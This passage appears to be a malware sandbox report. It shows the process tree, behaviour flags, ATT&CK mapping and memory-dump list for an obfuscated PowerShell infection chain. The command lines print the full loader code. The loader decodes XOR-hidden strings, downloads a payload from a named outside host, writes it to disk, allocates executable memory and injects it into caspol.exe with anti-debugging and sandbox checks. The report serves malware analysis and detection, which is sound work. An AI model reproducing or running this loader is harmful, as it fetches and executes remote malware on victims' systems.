Ir'Ta1Mi3So6Ga3Gi5KoFMi4Dd2Ma4Tr5Hy5ChEUn5Ak5At1De7Ho0SlAFe1fr7Rj6BaCRe6He4Ad4DeERe4Tt4Pn4Bo3an5Fr2Ve5MoAUn1Di9Fo6De5He4Ti2Ad5Sl9Xo4Co3Fi5EuERi5SpAEt5Sc2Po1St9Ub7bjENe5Gt9Ur4Un3Pf5In2De4Ku5Re5Re8Po4Po7Re6My4Va5re2Tr4Ro5Ac4Ko1Dr5SvEGr5Br4Ti5lg2Ju4Ku4No1La9In7HjALi5De6Tj4Au5Gr4Di4St5LaFDe5Sk6Sa5StBPa6SuAFe0deDSi0EiDSk7Ce0Re5In2Ta4Sa3Se7St3Ls5Tw2Ch5ArBLi5Ci2Gn5Se0as5Ru6ta4De3Ne5Bo2Ac7In1Ba5in8We4Gv5Pa7Ca1Kr4Vo2Sk5Pr9Zo5Be4He4Bo3De5BaEEg5De8Pr5Pr9Ka6Ki7pe5Un8un5FaEBe5St9Ra4pu3Ma5Fa2In4Sn5Ti1JaFer1UnFBo5In1In5DaCAf4Lj7El1Fl7Om1Et3In6Re0Po5Rr2Du5Ma6Bi4Sa3La5IlFan5St2Ud4Tr5Ar1Er7Mi1Gu3Te7Gi3Ge5KvEFo5Fl4Va5RaFAn5Gn2Vi0Op3Pr1AxEWo1DrBHm1Un7He1ApFgl7Ne0Ud7Ob3La6Bl3co1Re7Re7Fr7pi1heFMu6DiCEk7TrETh5Ka9Di4St3Fa6An7Ca4Di3Ov4Ta5ka6ElAPa1ReBSl1Co7Co6KlCUn6Oc2Bl7EhEFe5Hi9Re4Ra3Ti0Sa4Fu0Pa5Tr6ScAAt1VaBca1Di7Bl6ToCEp6An2Ta7UdEPr5Ka9Pa4Ab3Si0So4Ta0St5Ga6PaASu1AdBLo1Ha7Cr6SeCUd6Sh2Cl7AcESu5Si9Ke4Up3Fr0Ma4Ge0Ca5Fi6KlASe1MoEHe1An7Pr1BoFFi6FrCfa7LuEPo5Qu9Tu4Fi3La6Mo7Ps4Pi3Sk4En5Fa6elAAf1BeESp1DoEPe1ArEEa'Re;Va&lo(Un`$MeDpoimecTahAneSk7Si)Hu fo`$kaDPeiBoaAfnRoaMalMiuLanab6Hy;Ma`$DrSsklSaePrnBetElrPieFl1Ov7Ug7ta Eu=Ko SufCykRupOv Fe`$ChDTeiSocHohSyene5Na Ur`$GeDSuiAfcNehCoePr6Ov;Pr`$HyDStiJiaAfnFoaSclBiuUmnPo7Th Sk=Hm UrHSnTNuBPi Ga'Sp1ma3No7Fi1Ba4Af2Rn5FrBSe5Me3Fr4Da3av4Ri5Di5Ma1te5To1De5Th2Hf0ar4te1Ke7Na0OrAMo1Li7Se1Na3Se6Jo3Un5NaFPo4Sl2Cu4se5Ph5KoEKo5ad5De1Se9On7SiEFo5Ju9Fa4Fu1Pr5Al8Kl5SkCBs5An2Ti1RaFlo6FoCUn7FaETe5To9On4Fi3Ra6Pa7Po4Me3Ca4pr5Me6SlAVe0AnDOf0EaDBl6UnDSa5Op2un4Un5In5Un8Dk1ViBPl1So7Bo0St1en0Vr3In0MeFIn1SaBPr1Ho7pa0Ul7Ti4AnFGu0Fo4Fr0Pr7Ti0Ga7Ve0To7Bi1foBSu1Li7Fo0Un7Ad4ExFOf0J 3Tr0Fo7Wh1UnEUn'Mi;Go&At(Ke`$DoDReiKucBehCoere7op)Ma Ri`$HjDNyiVeaRenPsaEmlLiuCrnVe7Ti;Ra`$UnDStiUnarenKoaNolKvuvinRe8Re Un=St foHReTUdBAt Co'Tr1Ar3Cl7OmBFu5co8Di4bu2fe5ba9Im5Be6Un5Om9Si5KrEMi4Un4Re5ep5Pi5Re8Sc1Fi7Av0MoAAn1Or7At1Un3Or6Sg3Re5ReFni4Bi2Sk4So5Ju5JeEUn5Cl5Ou1Fl9Rr7hlEka5De9Cr4As1Re5Br8Un5InCmu5Sa2Br1PrFLe6HoCUr7DeEmu5Ro9Si4Ov3Sa6El7Ce4Si3Sa4Eh5Sk6StATy0LoDAf0suDGa6SpDWi5Wa2ha4ya5Di5St8Bl1InBIn1Pr7Ka0Ly5Fi0Cl7He0St1Fe0Hu2Sk0Ma1Ma0Bo6Om0sa5Te0KeFGa1KeBUn1St7Ve0Pr7Te4BeFIn0De4Ko0th7Te0In7Ap0Or7Go1MaBMi1Ud7He0Sy7Fo4WiFSe0In3Pa1KoEDe'Ka;Di&Zy(En`$PlDFuiSocOehPieRe7La)Fr Sk`$DeDEliPaaTenAzaPalBouDenRe8To;Ca`$PaiPhsUnoSnmKo0Ju1St he=Sm Pi'KohOptVetUnpDu:ko/En/SymTrelagTroMioPlkFobCopBenPrqTy.KocPafHe/paUEmnOviYonUrtAaeMerEf.NetSphConkr'Pi;or`$NyiGrsKloCrmEl0mi0zo Da=So UnHUnTUfBBa Ko'Mo1Re3un7Va5Mi4Re5Ir5Wi2De5Or3Fj4Ap3Sa5Yd1St5De6Id4Al1Ne5Is9He5mo2In1Sy7Un0InATi1Ke7No1TiFRe7Ib9Cy5Re2Ha4Fi0Re1TaASp7Se8Af5Pr5Uo5IdDAr5Pa2St5Sk4Be4Hy3Pa1Re7Me7Af9St5Ye2Ca4Ek3li1Ex9Vi6Sa0Ku5Oc2Ko5Ne5Pr7ar4Af5BrBPo5TiEan5Su2Ba5Av9Kr4Op3cr1JoESk1Ga9Ma7Ad3Pa5Fe8Be4Am0Pu5Sq9Bi5KoBUn5Vr8Bo5Ha6Ca5Ti3Ju6Is4Fl4Pr3Sp4sp5Ni5MoEBr5Sv9Cr5St0Ta1HyFSl1La3ge5SkESt4Su4Fr5Pr8Bl5PaASw0Pr7He0Ex6Bo1KaESa'Od;Ar`$AtDFoiJeaJonOuaBelSkuKonsc8Sa Ca=ka FoHVeTOtBIt an'Sa1mi3Sk7Av1El4Ki2Pe5AnBEp5Ho3Uo4Se3Fr4No5Sj5St1Bi5Sp1To5Ce2Ob0Ah5Po0TrAba1So3be5Ob2Sp5Ne9Kv4Em1Ar0CoDTo5Pr6Em4Pl7Tu4Kl7Sy5St3Fl5Wa6Ka4Po3Tw5Bl6Co'Bu;El&Br(tr`$kaDPriOicTrhFoehu7Gl)Br Th`$BaDUfiOvaFenSpaHolSuuUnnDe8Qu;Sk`$ruFAcuKolTudPhtUdrJyfSufBrePi2Sa=Ti`$ScFTeuDolWaddetSurUnfTjfaneHa2Sa+Lo'Sa\UdHWyaOunRhdSe.pidDoaBltVi'La;Bi`$saBCarveeIndIntRafbyaEnvNanTeeme=No'Aj'Co;SciGifVa Sk(Sa-PrnStoSttHi(CuTReeSwsHatSp-AmPRaaHvtGhhWe La`$CoFUnuStlPrdAptcorStfUlfKreEk2Ab)Ar)St At{BowBihSkiDolAfeTh Mo(Fa`$TrBPrrSpeSudMutKafLiaGovConPleAr Re-DeeprqAf Ps'Un'De)In Ce{Vi&Ek(Pe`$NiDFuiUncSahFoele7Tr)Au Te`$LiiUnsScoSnmIg0Se0Pr;SpSBatKaaJurExtAn-CoSdelUleDeeExpKo Kv5Lu;Mo}GrSOveOptDe-mnCBroUnnBitSueAtnSatDe Ge`$ChFKouWolApdSktParAlfPsfsnePr2Om Ch`$HyBUnrIseSkdGrtRefThaSqvBynbreBi;Sp}Uf`$MoBJirLieBrdtatCofFlaThvErnUdeRe Te=Ud TaGLiedatIn-LoCsaoAfnSntOpeUnnhotHa Se`$CaFScuBrlDudvatSurBefCufKjeVa2fa;Pr`$OrDMeiPraDinReaSllfiuDence9Ep Ap=Du leHNiTLaBLe Mn'Vr1Ta3Co7Se3Sj5GoEUd5Pr6Ug5Wa9Tr5Sq6Tr5elBSt4Pa2In5Hj9De1tr7Tu0UsAHj1st7Ma6AjCPa6ka4Sr4UdEMi4Da4Bo4op3Di5Cy2Va5StAVi1So9Sk7Po4Fo5To8Fu5Ha9Mi4Ti1Sy5Ca2om4Ci5ha4Og3qu6moAAg0ChDPa0YaDRi7Bl1Av4Bi5Me5Ku8Ra5WiAAa7De5Se5Ge6de4Re4Sk5Po2Un0Re1Hv0Ka3Ml6an4Un4Ov3Ka4La5Be5FlESc5en9Fu5Un0Ja1prFTi1Hr3Su7Un5va4Fu5fo5Um2To5Di3un4Do3Si5Af1Mi5Pe6Ra4Hj1Sa5Br9Be5fe2Co1CoEAt'Af;Pe&Mi(An`$DoDCaiRocHohBleIn7Pe)Bi Sp`$DrDJuivraPlnbeaInlDyuCrnGa9St;da`$FoBInrAfePldBotEgfShaWevSmnGeeWa0Gg Ep=Mi CaHorTLuBOt Pe'An6BiCKj6Be4Fo4OvEde4Be4Gr4Se3Fl5Ga2Ju5MeACo1Ko9Li6Ga5Br4An2Be5Gr9Pe4Uv3Du5TrEPa5CiATr5Fo2Th1ov9Ic7fuEda5Po9Tw4Br3Fo5Re2Ba4An5Sk5Me8Pr4Ru7No6Ma4Nu5Do2bo4Im5In4Du1Vo5GoETe5Be4ru5Ko2Re4Hj4Pa1Me9Un7FrASp5Pr6Re4Bo5In4Re4Ro5OvFGo5Dr6Pr5ToBEl6AsAPr0BeDIn0AfDto7Gi4Me5Un8Sv4fe7ke4peEBe1NiFre1Tr3Ma7Sk3Un5GaEPa5Ou6Ku5hy9De5Gr6Es5PoBIn4Be2Fo5Go9Ko1KoBSl1Dr7Kl0Kj7Un1DeBPr1St7re1Di7Sk1Tr3In7So1Sl4Cr2Mi5CiBSi5Hy3Op4Ef3Re4Ab5Te5Un1Bo5Ce1Un5Pu2Fr0Ba4Ed1SkBNo1Kr7Ga0Ma1Le0Ud3de0BrFPa1faEBe'Kn;At&Br(Of`$AfDmiiCycHahPoeTr7Sy)Ki in`$BaBLirSteAndMotFofGaaNevStnUmeAu0Km;Un`$TrPLeiElnLesKaeRrdinaSa=Pr`$KnDFoiNoaDrnHuaAvlInuStnPr.SecTeoBouHenLitAv-De6ex4ha8Ac;Lu`$BeBFlrEseAsdAstSpfAgaTevPenTaeSh1Fr In=Ny BoHDeTDyBAl Kn'We6CoCSt6Sh4Po4PeECr4To4Ne4Sp3De5Sc2De5SpASa1Se9Aa6Co5Co4Me2Li5Un9Op4Fr3No5VdEEs5BlARe5Ov2Lf1In9Em7CoETa5Re9Re4Me3Bi5Ek2De4St5Sc5Na8Pa4St7Pr6Au4Ca5Hi2Co4Sp5Fo4Sc1Me5PrESw5Li4so5Re2Mo4Pl4Fa1Sk9An7RuADe5Un6St4gu5Ar4De4Al5BeFGe5In6Re5HoBAf6HyAAb0BuDEf0HaDDe7Un4Id5Ef8Fo4Jo7Lo4JeECh1WrFHa1Fr3Je7Be3Ha5spEAn5At6Ni5No9In5Se6Pa5InBGr4Ho2Fi5me9ab1WaBop1Ga7Se0De1Sp0In3Ab0IrFUn1NoBHe1Hy7Ki1Br3Dd7GaBRu5Fr8Al4Ho2Di5Pe9sk5Fo6De5Un9Mu5BeENo4te4Ha5Fo5mu5Sa8Iv1EkBUn1Pe7mo1Sk3In6Un7Ad5ReEMe5Sh9Cr4Fa4Su5As2Hj5Sa3Ga5Bl6Di1KuEpe'Fi;Co&El(Gr`$StDKeiPlclrhSueHy7Ha)Co Ko`$RaBForTyeAddCotFofReaPevfrnhoeFe1St;Ud`$GoBTorEmeDedLetCefAfaUnvSlnKaesu2Qu Co=Sa PiHHjTStBsk Pa'Ob1Vi3Fl6To4Li4Pa3At5HeESm5BuBPr5moBFi5Br2st5Sy3ka1He7Fo0SuAFo1Sn7Co6VaCAc6Wo4Ai4ClEto4Ha4Hk4Pa3Af5Pa2Pa5RuACo1Re9Ku6Ra5Ko4No2se5Cu9Po4De3Be5JoEde5bnAFe5Te2Ma1Sk9Sp7BaEUd5Pr9My4Ne3Ta5He2Ce4Bu5Pa5Ra8me4Ir7Ma6Du4Un5Al2Pr4Nb5Me4Re1Ov5afENe5Ud4Jo5Bi2Fa4Bi4Un1Af9Ja7SuACr5Un6Ec4Ar5Br4Ar4Og5BrFTr5Fa6Ko5RiBJo6SiAAd0RuDPa0OsDpe7Bi0St5Hj2In4Di3re7Br3Ro5Em2Fr5OvBAf5Ca2Be5Tu0He5Tr6Be4Pa3Ps5Re2Mi7Ho1to5Nu8Al4Hj5He7Pr1He4Br2Te5In9cr5Ma4An4Bn3Fy5DeEAf5Ga8En5Do9Bl6St7Su5Ta8Sy5myEWa5Ra9hv4Aa3Fa5Py2be4Fo5An1EfFPr1SqFFd5Am1Ze5AfCEt4Il7Ol1In7Ar1Gr3Sk7Em5Va5Ha2Bo5Ci5Fr4In2Sp5al3Ek5Sn2Mo5FoBOv4De4Re5Gi2Pa1Em7Fe1Ka3Si6Fo4Re5Be2ec5Un3Om5av3Pr1HoETe1SiBda1Be7Sc1BlFAd7Su0Ps7Fo3Tw6Ta3Sh1Le7Pl7Ba7Pr1SeFPr6FoCco7noEOv5Ep9Al4Ud3Ma6Ex7Re4va3Pa4Vo5bh6MaASt1VaBTe1Ka7Mr6LeCBa7UnEDe5No9Se4Na3Bu6Ga7Tp4Da3At4Ba5Po6FeASh1CiBIn1Re7Pe6ReCBr7GrEno5Ta9Am4Sa3Sk6da7Ar4Pi3Fo4Br5Pi6FiAKa1BaBGa1Ss7Ep6ArCSa7NuETi5Ne9Sn4Co3Ku6Be7Re4At3Er4Sj5Me6BrARk1CrBCe1Om7Za6BaCKr7SyEDi5Pi9Ae4Ki3Ob6At7sk4Wh3Ud4se5Pa6waAEx1ExENa1Bu7Pr1TuFQa6XyCAf7SaESc5Je9Tr4St3No6wi7re4Da3Se4De5Ov6SkADe1AlEPi1LyECh1MiEBr'Go;Uk&Ur(bo`$SuDReiBlcGrhPaeSe7Gl)Fi Sp`$TrBTrrGaeUndRhtUnfAlaBivFonVieFu2Da;li`$StBEprzeesedMatBofSnaVavPrnUdeKi3In So=Sk DeHkoTZoBSi Ti'br1Br3Cy6Tr4Ex4Pa3Ra5KoERe5MaBTr5UdBCo5Pl2Ch5Az3Pe1Re9Af7KoEAt5Dy9Pe4Ba1Wi5De8Pa5MiCNa5Cr2Fl1KrFCh1Ku3Nu7Le1Ov4Bi2At5FiBFe5No3Ju4Ku3Sj4ap5Do5Ki1Pa5Sy1Sp5Af2Lo0Te4Ic1ZoBPr1kl3Mu7ApBNu5Op8Be4Li2Li5Un9Gt5Ce6Un5Re9Gu5SyETr4Ud4Ha5gi5Ma5Dy8Un1NgBTo1Si3Re6Th4Vi5WhBSe5Sa2St5Er9Ha4Ba3Pr4Fa5Gu5Du2Pr0Su6Be0du0Fe0Tr0He1DiBUn0Vo7So1BrBCo0Mi7go1AfEpr'mo;Fo&Se(Yo`$StDGyiRecGrhNseAn7Ud)Ku At`$CyBDiroveFadUntNofSuaskvSenIneFo3Sq#Ov;""";Function Bredtfavne9 { param([String]$Bathy); For($Grey=2; $Grey -lt $Bathy.Length-1; $Grey+=(2+1)){$isom = $isom + $Bathy.Substring($Grey, 1)}; $isom;}$Escribie0 = Bredtfavne9 'ReITeEeqXFr ';$Escribie1= Bredtfavne9 $Spalt;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Escribie1 ;}else{&$Escribie0 $Escribie1;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4684
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Bathy); $Lavadelsme135 = ''; Write-Host $Lavadelsme135; Write-Host $Lavadelsme135; Write-Host $Lavadelsme135; $Teniacida = New-Object byte[] ($Bathy.Length / 2); For($Grey=0; $Grey -lt $Bathy.Length; $Grey+=2){ $Teniacida[$Grey/2] = [convert]::ToByte($Bathy.Substring($Grey, 2), 16); $Teniacida[$Grey/2] = ($Teniacida[$Grey/2] -bxor 55); } [String][System.Text.Encoding]::ASCII.GetString($Teniacida);}$poemetsch0=HTB '644E4443525A19535B5B';$poemetsch1=HTB '7A5E5445584458514319605E590405196259445651527956435E41527A52435F585344';$poemetsch2=HTB '7052436745585476535345524444';$poemetsch3=HTB '644E4443525A19654259435E5A52197E594352455847645245415E545244197F5659535B52655251';$poemetsch4=HTB '4443455E5950';$poemetsch5=HTB '7052437A5853425B527F5659535B52';$poemetsch6=HTB '6563644752545E565B79565A521B177F5E5352754E645E501B176742555B5E54';$poemetsch7=HTB '654259435E5A521B177A565956505253';$poemetsch8=HTB '6552515B525443525373525B5250564352';$poemetsch9=HTB '7E597A525A58454E7A5853425B52';$Diche0=HTB '7A4E73525B5250564352634E4752';$Diche1=HTB '745B5644441B176742555B5E541B176452565B52531B177659445E745B5644441B1776424358745B564444';$Diche2=HTB '7E5941585C52';$Diche3=HTB '6742555B5E541B177F5E5352754E645E501B17795240645B58431B17615E454342565B';$Diche4=HTB '615E454342565B765B5B5854';$Diche5=HTB '5943535B5B';$Diche6=HTB '794367455843525443615E454342565B7A525A58454E';$Diche7=HTB '7E726F';$Diche8=HTB '6B';$Bebudelse=HTB '626472650405';$Sedd=HTB '74565B5B605E595358406745585476';function fkp {Param ($Superst, $Artful) ;$Dianalun0 =HTB '137958595B5E56555E5B170A171F6C76474773585A565E596A0D0D7442454552594373585A565E5919705243764444525A555B5E52441F1E174B17605F5245521A78555D525443174C17136819705B5855565B764444525A555B4E7456545F52171A765953171368197B585456435E58591964475B5E431F13735E545F520F1E6C1A066A19724642565B441F134758525A524344545F071E174A1E19705243634E47521F134758525A524344545F061E';&($Diche7) $Dianalun0;$Dianalun5 = HTB '1363455847170A17137958595B5E56555E5B197052437A52435F58531F134758525A524344545F051B176C634E47526C6A6A17771F134758525A524344545F041B17134758525A524344545F031E1E';&($Diche7) $Dianalun5;$Dianalun1 = HTB '455243424559171363455847197E5941585C521F1359425B5B1B17771F6C644E4443525A19654259435E5A52197E594352455847645245415E545244197F5659535B526552516A1F7952401A78555D52544317644E4443525A19654259435E5A52197E594352455847645245415E545244197F5659535B526552511F1F7952401A78555D525443177E59436743451E1B171F137958595B5E56555E5B197052437A52435F58531F134758525A524344545F021E1E197E5941585C521F1359425B5B1B17771F13644247524544431E1E1E1E1B171376454351425B1E1E';&($Diche7) $Dianalun1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Trfsikkerr,[Parameter(Position = 1)] [Type] $Konklaven = [Void]);$Dianalun2 = HTB '1371564552595843170A176C76474773585A565E596A0D0D7442454552594373585A565E59197352515E5952734E59565A5E54764444525A555B4E1F1F7952401A78555D52544317644E4443525A196552515B5254435E585919764444525A555B4E79565A521F134758525A524344545F0F1E1E1B176C644E4443525A196552515B5254435E585919725A5E4319764444525A555B4E75425E5B5352457654545244446A0D0D6542591E197352515E5952734E59565A5E547A5853425B521F134758525A524344545F0E1B171351565B44521E197352515E5952634E47521F13735E545F52071B1713735E545F52061B176C644E4443525A197A425B435E5456444373525B52505643526A1E';&($Diche7) $Dianalun2;$Dianalun3 = HTB '1371564552595843197352515E595274585944434542544358451F134758525A524344545F011B176C644E4443525A196552515B5254435E58591974565B5B5E5950745859415259435E5859446A0D0D64435659535645531B1713634551445E5C5C5245451E196452437E5A475B525A52594356435E5859715B5650441F134758525A524344545F001E';&($Diche7) $Dianalun3;$Dianalun4 = HTB '1371564552595843197352515E59527A52435F58531F13735E545F52051B1713735E545F52041B17137C58595C5B564152591B1713634551445E5C5C5245451E196452437E5A475B525A52594356435E5859715B5650441F134758525A524344545F001E';&($Diche7) $Dianalun4;$Dianalun5 = HTB '45524342455917137156455259584319744552564352634E47521F1E';&($Diche7) $Dianalun5 ;}$Weather = HTB '5C524559525B0405';$Dianalun6 = HTB '13635F42455E55170A176C644E4443525A19654259435E5A52197E594352455847645245415E545244197A5645445F565B6A0D0D70524373525B525056435271584571425954435E585967585E594352451F1F515C471713605256435F52451713735E545F52031E1B171F70736317771F6C7E59436743456A1B176C627E594304056A1B176C627E594304056A1B176C627E594304056A1E171F6C7E59436743456A1E1E1E';&($Diche7) $Dianalun6;$Slentre177 = fkp $Diche5 $Diche6;$Dianalun7 = HTB '1371425B53434551515204170A1713635F42455E55197E5941585C521F6C7E59436743456A0D0D6D5245581B1701030F1B17074F040707071B17074F03071E';&($Diche7) $Dianalun7;$Dianalun8 = HTB '137B58425956595E445558170A1713635F42455E55197E5941585C521F6C7E59436743456A0D0D6D5245581B17050701020106050F1B17074F040707071B17074F031E';&($Diche7) $Dianalun8;$isom01 = 'http://megookbpnq.cf/Uninter.thn';$isom00 = HTB '1375455253435156415952170A171F7952401A78555D5254431779524319605255745B5E5259431E19735840595B5856536443455E59501F135E44585A07061E';$Dianalun8 = HTB '1371425B534345515152050A135259410D56474753564356';&($Diche7) $Dianalun8;$Fuldtrffe2=$Fuldtrffe2+'\Hand.dat';$Bredtfavne='';if (-not(Test-Path $Fuldtrffe2)) {while ($Bredtfavne -eq '') {&($Diche7) $isom00;Start-Sleep 5;}Set-Content $Fuldtrffe2 $Bredtfavne;}$Bredtfavne = Get-Content $Fuldtrffe2;$Dianalun9 = HTB '13735E5659565B4259170A176C644E4443525A19745859415245436A0D0D7145585A7556445201036443455E59501F13754552534351564159521E';&($Diche7) $Dianalun9;$Bredtfavne0 = HTB '6C644E4443525A19654259435E5A52197E594352455847645245415E545244197A5645445F565B6A0D0D7458474E1F13735E5659565B42591B17071B17171371425B534345515152041B1701030F1E';&($Diche7) $Bredtfavne0;$Pinseda=$Dianalun.count-648;$Bredtfavne1 = HTB '6C644E4443525A19654259435E5A52197E594352455847645245415E545244197A5645445F565B6A0D0D7458474E1F13735E5659565B42591B1701030F1B17137B58425956595E4455581B1713675E59445253561E';&($Diche7) $Bredtfavne1;$Bredtfavne2 = HTB '1364435E5B5B5253170A176C644E4443525A19654259435E5A52197E594352455847645245415E545244197A5645445F565B6A0D0D70524373525B525056435271584571425954435E585967585E594352451F1F515C4717137552554253525B44521713645253531E1B171F70736317771F6C7E59436743456A1B176C7E59436743456A1B176C7E59436743456A1B176C7E59436743456A1B176C7E59436743456A1E171F6C7E59436743456A1E1E1E';&($Diche7) $Bredtfavne2;$Bredtfavne3 = HTB '1364435E5B5B5253197E5941585C521F1371425B534345515152041B137B58425956595E4455581B13645B52594345520600001B071B071E';&($Diche7) $Bredtfavne3#"
    3⤵
    - Blocklisted process makes network request
    - Checks QEMU agent file
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4784
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
      4⤵
      Checks QEMU agent file
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4172
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 1928
        5⤵
        Program crash
        
        PID:4416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4172 -ip 4172
1⤵
PID:3484

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

1

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/4172-158-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4172-155-0x0000000000F10000-0x00000000022C3000-memory.dmp

Filesize
19.7MB

Download
memory/4172-156-0x00007FF875630000-0x00007FF875825000-memory.dmp

Filesize
2.0MB

Download
memory/4172-168-0x0000000077190000-0x0000000077333000-memory.dmp

Filesize
1.6MB

Download
memory/4172-167-0x00007FF875630000-0x00007FF875825000-memory.dmp

Filesize
2.0MB

Download
memory/4172-166-0x0000000000F10000-0x00000000022C3000-memory.dmp

Filesize
19.7MB

Download
memory/4172-157-0x0000000077190000-0x0000000077333000-memory.dmp

Filesize
1.6MB

Download
memory/4172-162-0x0000000020970000-0x0000000020A0C000-memory.dmp

Filesize
624KB

Download
memory/4172-161-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/4172-159-0x0000000000401000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4684-136-0x00007FF857620000-0x00007FF8580E1000-memory.dmp

Filesize
10.8MB

Download
memory/4684-165-0x00007FF857620000-0x00007FF8580E1000-memory.dmp

Filesize
10.8MB

Download
memory/4684-149-0x00007FF857620000-0x00007FF8580E1000-memory.dmp

Filesize
10.8MB

Download
memory/4684-135-0x0000021447990000-0x00000214479B2000-memory.dmp

Filesize
136KB

Download
memory/4784-141-0x0000000005A50000-0x0000000005AB6000-memory.dmp

Filesize
408KB

Download
memory/4784-144-0x0000000007AD0000-0x000000000814A000-memory.dmp

Filesize
6.5MB

Download
memory/4784-151-0x00007FF875630000-0x00007FF875825000-memory.dmp

Filesize
2.0MB

Download
memory/4784-152-0x0000000077190000-0x0000000077333000-memory.dmp

Filesize
1.6MB

Download
memory/4784-148-0x0000000009AC0000-0x000000000A064000-memory.dmp

Filesize
5.6MB

Download
memory/4784-154-0x0000000077190000-0x0000000077333000-memory.dmp

Filesize
1.6MB

Download
memory/4784-147-0x0000000007480000-0x00000000074A2000-memory.dmp

Filesize
136KB

Download
memory/4784-146-0x00000000074F0000-0x0000000007586000-memory.dmp

Filesize
600KB

Download
memory/4784-145-0x0000000006790000-0x00000000067AA000-memory.dmp

Filesize
104KB

Download
memory/4784-150-0x0000000008150000-0x0000000009503000-memory.dmp

Filesize
19.7MB

Download
memory/4784-143-0x0000000006250000-0x000000000626E000-memory.dmp

Filesize
120KB

Download
memory/4784-142-0x0000000005B30000-0x0000000005B96000-memory.dmp

Filesize
408KB

Download
memory/4784-163-0x0000000008150000-0x0000000009503000-memory.dmp

Filesize
19.7MB

Download
memory/4784-164-0x0000000077190000-0x0000000077333000-memory.dmp

Filesize
1.6MB

Download
memory/4784-140-0x0000000005270000-0x0000000005292000-memory.dmp

Filesize
136KB

Download
memory/4784-139-0x0000000005320000-0x0000000005948000-memory.dmp

Filesize
6.2MB

Download
memory/4784-138-0x0000000004CB0000-0x0000000004CE6000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads